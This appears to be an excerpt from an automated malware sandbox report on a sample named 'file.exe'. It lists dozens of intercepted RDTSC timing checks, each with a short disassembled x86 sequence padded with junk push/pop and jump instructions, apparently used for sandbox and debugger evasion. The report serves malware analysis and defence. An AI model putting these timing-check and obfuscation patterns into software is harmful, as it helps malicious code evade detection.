              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85033C second address: 850353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE4C120028Ah 0x0000000a ja 00007FE4C120028Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850631 second address: 850637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8507D0 second address: 8507F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE4C1200286h 0x0000000a popad 0x0000000b jmp 00007FE4C1200291h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8507F2 second address: 850800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850800 second address: 850808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850808 second address: 85080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85080E second address: 850813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8091DC second address: 8091E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8091E0 second address: 8091FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FE4C1200298h 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FE4C1200286h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8091FE second address: 809290 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE4C10F4F68h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov di, 6ED1h 0x00000029 mov ch, A8h 0x0000002b mov ebx, dword ptr [ebp+1248C27Eh] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FE4C10F4F68h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov edx, dword ptr [ebp+122D2A50h] 0x00000051 add eax, ebx 0x00000053 jmp 00007FE4C10F4F71h 0x00000058 call 00007FE4C10F4F70h 0x0000005d movzx ecx, dx 0x00000060 pop edx 0x00000061 nop 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8553D6 second address: 8553EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 je 00007FE4C1200288h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FE4C120028Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8546A6 second address: 8546B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8546B0 second address: 8546B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8546B4 second address: 8546D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4C10F4F71h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854DDB second address: 854DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854DF4 second address: 854DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854DFA second address: 854DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857636 second address: 85763C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A436 second address: 85A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A43C second address: 85A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE4C10F4F75h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A458 second address: 85A462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A462 second address: 85A466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DCC second address: 859DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C1200286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 859DD8 second address: 859DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F70h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BA85 second address: 85BA8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE4C1200286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BA8F second address: 85BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BA95 second address: 85BAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FE4C120028Fh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BAAA second address: 85BAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FE4C10F4F72h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FE4C10F4F75h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B2C second address: 862B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B30 second address: 862B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B41 second address: 862B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B49 second address: 862B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860CF0 second address: 860CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860CF4 second address: 860D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860D01 second address: 860D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE4C120028Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860D17 second address: 860D21 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86139E second address: 8613A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8613A2 second address: 8613A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8616F5 second address: 8616FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861CC8 second address: 861CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86281F second address: 86284D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE4C1200299h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C120028Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A8C5 second address: 86A8CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A8CF second address: 86A8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A8D3 second address: 86A8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B12F second address: 86B135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B135 second address: 86B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FE4C10F4F6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B142 second address: 86B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B146 second address: 86B160 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C10F4F72h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CCA5 second address: 86CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CCAB second address: 86CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872356 second address: 87237F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C1200286h 0x00000008 jmp 00007FE4C1200291h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4C120028Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87237F second address: 872383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872383 second address: 872389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872389 second address: 8723BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FE4C10F4F6Ah 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FE4C10F4F71h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872945 second address: 872954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FE4C120028Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872954 second address: 87295F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE4C10F4F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87295F second address: 872967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872AC7 second address: 872ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872ACD second address: 872AD7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE4C12002A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C4D second address: 872C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE4C10F4F66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C57 second address: 872C5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874090 second address: 8740E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007FE4C10F4F66h 0x00000012 js 00007FE4C10F4F66h 0x00000018 jmp 00007FE4C10F4F70h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE4C10F4F74h 0x00000025 jmp 00007FE4C10F4F74h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F16 second address: 871F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jng 00007FE4C120028Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F2D second address: 871F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871F44 second address: 871F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C120028Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAFA9 second address: 7BAFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4D7 second address: 87C4DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4DD second address: 87C4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F6Dh 0x0000000d jo 00007FE4C10F4F66h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E1 second address: 8880E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E5 second address: 8880E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880E9 second address: 888106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FE4C1200292h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888106 second address: 888112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887CCD second address: 887CD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE4C1200286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C3EF second address: 88C3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C3FA second address: 88C400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BF55 second address: 88BF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BF59 second address: 88BFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C1200293h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FE4C1200297h 0x00000012 jnl 00007FE4C120028Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jnp 00007FE4C1200286h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0451 second address: 8A0464 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FE4C10F4F66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0464 second address: 8A046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A046A second address: 8A046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A046F second address: 8A0481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C120028Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0260 second address: 8A0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE4C10F4F76h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0281 second address: 8A02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007FE4C1200286h 0x00000013 jnc 00007FE4C1200286h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FE4C120028Ch 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007FE4C1200297h 0x00000027 jg 00007FE4C1200286h 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 jno 00007FE4C1200286h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A53D6 second address: 8A53DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5520 second address: 8A553A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a je 00007FE4C1200288h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A553A second address: 8A5540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5540 second address: 8A5544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5544 second address: 8A5569 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE4C10F4F77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007FE4C10F4F66h 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A59A2 second address: 8A59A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A59A8 second address: 8A59B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FE4C10F4F68h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B50 second address: 8A5B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5B56 second address: 8A5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4C10F4F75h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5CFB second address: 8A5CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5E2D second address: 8A5E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007FE4C10F4F66h 0x00000010 jmp 00007FE4C10F4F6Bh 0x00000015 ja 00007FE4C10F4F66h 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5E64 second address: 8A5E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6299 second address: 8B629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
